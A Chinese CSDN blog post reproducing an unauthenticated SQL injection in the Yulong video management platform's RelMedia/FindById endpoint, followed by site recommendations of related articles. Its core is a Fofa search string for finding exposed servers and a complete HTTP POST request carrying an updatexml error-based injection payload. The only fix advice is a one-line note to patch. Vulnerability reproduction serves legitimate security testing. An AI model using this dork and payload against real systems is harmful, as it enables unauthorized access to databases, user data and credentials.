誉龙视音频综合管理平台 RelMedia/FindById SQL注入复现

最新推荐文章于 2024-09-17 19:54:08 发布
最新推荐文章于 2024-09-17 19:54:08 发布
阅读量165 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142317186
版权

0x01 漏洞描述:

誉龙公司定位为系统级的移动视音频记录解决方案提供商,凭借其深厚的行业经验,坚持自主研发,匠心打造记录仪领域行业生态,提供开放式的记录仪APK、GB28181 SDK、国网B协议、管理平台软件OEM。其在RelMedia/FindById路由中存在sql注入,未经身份验证的攻击者可通过漏洞写入可执行的sql语句用以窃取用户数据、账号密码等,高权限角色甚至可执行shell。

0x02 搜索语句:

Fofa:body="PView 视音频管理平台"

0x03 漏洞复现:

POST /index.php?r=RelMedia/FindById HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

id=1+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+

 

0x04 修复建议:

厂商已发布补丁请及时修复。

iSee857
关注
专栏目录
誉龙视音频综合管理平台 RelMedia/FindById SQL注入漏洞复现
0xSec
09-14 271
誉龙视音频综合管理平台 RelMedia/FindById 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
Hibernate JPA-JPA中getOne()/findOne()/findById()的区别及使用
西京刀客
10-09 4787
文章目录Spring Data JPA 中findOne() / getOne()/findById()的区别findOnegetOnefindById总结 Spring Data JPA 中findOne() / getOne()/findById()的区别 根据主键获取某条数据的函数:findOne() 和 getOne() findOne findOne:return 如果没有找到,则使用给定id或{@literal null}的实体。findOne:当我查询一个不存在的id数据时,返回的值是null
mybatis如何防止SQL注入
m0_61802230的博客
05-17 8485
sql注入发生的时间,sql注入发生的阶段在sql预编译阶段,当编译完成的sql不会产生sql注入 一、采用jdbc操作数据时候 String sql = "update ft_proposal set id = "+id; PreparedStatement prepareStatement = conn.prepareStatement(sql); prepareStatement.executeUpdate(); preparedStatement 预编译对象会对传入sql进行预编译,那么当传入.
Java代码审计之SQL注入
tpaer的博客
12-05 2408
复现了Java中JDBC及Mybatis框架采用预编译和非预编译时可能存在SQL注入的几种情况,并给予修复建议。
网络攻防——基于深度学习的SQL注入攻击
weixin_52466982的博客
12-25 1834
基于深度学习的sql注入攻击
关于SQL注入及防御
Wang的专栏
06-12 2545
一般攻击者会假设网站有sql注入的漏洞,比如这个查询语句: 攻击者假设这个10是文章的id, 攻击者就会猜测可能是上面的sql语句 页面上输入的参数是10,这时候,就可以拼凑测试,比如在url上拼接 1 ) 判断是否可以注入, 一般而言,如果可以的话页面正常,不报错,但是也有其他情况,如下 这两个都没什么反应,不报错,页面正常,说明后面的and没有起作用 攻击者会猜测可能是字符串存在引号的问题, 继续尝试 这样如果页面出错,那么继续修改 这时候页面不报错 这种情况(恒等正常,恒不等报错)就说明,一
jpa2.x的getOne()/findOne()/findById()的区别及使用
布吉_岛
08-02 2万+
使用spring-cloud 2.0.3时,加入了spring-boot-start-data-jpa依赖之后并配置完成,然后进行测试: 这是service 方法,注入了IUserInfoDao接口(继承JpaRepository<UserInfoModel, Integer>); @Override public UserInfoModel getById(In...
MybatisPlus 之 Sql 注入器
凉茶铺的博客
06-14 1762
我们已经知道,在MP中,通过AbstractSqlInjector将BaseMapper中的方法注入到了Mybatis容器,这样这些方法才可以正常执⾏。那么,如果我们需要扩充BaseMapper中的⽅法,⼜该如何实现呢?下⾯我们以扩展findAll⽅法为例进行学习。 其他的Mapper都可以继承该Mapper,这样实现了统⼀的扩展。如: 如果直接继承AbstractSqlInjector的话,原有的BaseMapper中的⽅法将失效,所以我们选择继承DefaultSqlInjector进行扩展。
Java写Sql注入时间盲注Demo对Mysql的substring、 case when 、offset、使用以及payload
Recar的博客
05-23 2439
突然想做ctf题遇到了问题。 记录下几个函数的使用substring是切割函数,可以切割指定字符先select version 切割 一定别忘了看用 select 1,1就是说从1开始的到第1个字符改变获取第二个字符依次加就可以一个一个的获取如果在mysql中做判断的话是select (select version())='5.5.40';错误的话返回的是0 case when 是做判
MyBatis:动态sql语句
流楚丶格念的博客
07-03 1351
​ Mybatis 的映射文件中,前面我们的 SQL 都是比较简单的,有些时候业务逻辑复杂时,我们的 SQL是动态变化的,此时在前面的学习中我们的 SQL 就不能满足要求了。参考的官方文档,描述如下: 官网地址:https://mybatis.org/mybatis-3/zh/dynamic-sql.html我们根据实体类的不同取值,使用不同的 SQL语句来进行查询。比如在 id如果不为空时可以根据id查询,如果username 不同空时还要加入用户名作为条件。这种情况在我们的多条件组合查询中经常会碰到。
JDBC:createStatement(sql注入)与PrepareStatement(防止sql注入)程序案例代码优化
羊咩咩的博客
01-13 495
把程序中重复的代码写为一个工具类。 createStatement package cn.dao; import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; import java.util.ArrayList; import java.util.List; import ja
SpringData JPA进阶查询—JPQL/原生SQL查询、分页处理、部分字段映射查询
热门推荐
Caizhfy的博客
01-07 3万+
上一篇介绍了入门基础篇SpringDataJPA访问数据库。本篇介绍SpringDataJPA进一步的定制化查询,使用JPQL或者SQL进行查询、部分字段映射、分页等。本文尽量以简单的建模与代码进行展示操作,文章比较长,包含查询的方方面面。如果能耐心看完这篇文章,你应该能使用SpringDataJPA应对大部分的持久层开发需求。如果你需要使用到动态条件查询,请查看下一篇博客,专题介绍SpringD
时间&安全精细化管理平台存在未授权访问漏洞
2301_77012231的博客
09-14 389
登录--时间&安全精细化管理平台存在未授权访问漏洞导致与员工信息泄露。
【农信网-注册/登录安全分析报告】
09-16 1018
北京农信互联科技集团有限公司是一家农业互联网高科技企业,以“用互联网改变农业”为使命,致力于构建最有影响力的农业数智生态平台,推动中国农业数字化转型升级。作为农业互联网领域的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
Java代码审计篇 | ofcms系统审计思路讲解 - 篇4 | XXE漏洞审计
哦 卷!
09-14 881
我发现很多文章包括教程,大概套路是:只说有漏洞的点,将有漏洞的点指出,然后分析代码;或者黑盒测试出漏洞之后,然后分析代码。我认为这是在分析漏洞代码,而非代码审计。代码审计文章或教程应该是从0开始找到漏洞所在,包括思路!所以这里不管有没有漏洞,我都会把审计过程写出来,因此篇幅会很长,但我认为这样对你会很有帮助。知其然亦知所以然。XXE漏洞审计Java代码审计篇 | ofcms系统审计思路讲解 - 篇1 | 环境搭建、路由机制。
远程跨境传输大文件如何做到安全又稳定?
镭速的博客
09-14 642
在当今全球化的商业环境中,企业跨境传输大文件的需求日益增长。这不仅涉及到数据的快速迁移,还包括了安全性、稳定性和合规性等多重挑战。本文将探讨企业在跨境传输大文件时可能遇到的问题,以及在传输过程中应注意的事项,并重点介绍镭速在方面的优势。
对称密码中的密钥是如何实现安全配送的?
最新发布
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
09-17 535
密钥配送问题是指在对称密码算法中,加密和解密使用同一个密钥,发送方必须设法将密钥安全地发送给接收方,而不会被第三方窃听者截获。如果密钥被窃取,那么加密的数据也会被破解,因此密钥的安全配送成为对称密码算法的一个关键问题。为了解决这个问题,密码学领域发展出了多种策略和解决方案。通过通信双方事先共享密钥密钥来解决通过密钥分配中心(KDC)来解决通过密钥交换Diffie-Hellman(DH)来解决通过公钥密码来解决。
信刻光盘安全隔离与信息交换系统
cdprinter的博客
09-11 445
信刻按需研制的光盘安全隔离与信息交换系统,应用不同等级网络之间进行可靠、高效的安全数据交换,实现A网-B网,B网-A网双向摆渡。集数据自动摆渡、用户管理、日志管理、加密及杀毒、数据检查与过滤、校验、安全审计等功能于一体。
@RequestMapping("/findById") public Map<String, Object> findById(Integer userId) { Map<String, Object> resultMap = new HashMap<String, Object>(); User user = userService.findById(userId); resultMap.put("errorNo", 0); resultMap.put("data", user); return resultMap; }
06-03
这段代码是一个 Java Spring 框架的控制器方法,使用 @RequestMapping 注解将该方法映射到"/findById"的URL路径。该控制器方法接收一个 Integer 类型的 userId 参数,并调用 userService 的 findById 方法来根据该 userId 获取对应的 User 对象。最后,将 User 对象封装在一个 Map 中,然后返回这个 Map 作为响应结果。其中,errorNo 表示错误码,0 表示没有错误,data 表示返回的数据,即 User 对象。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值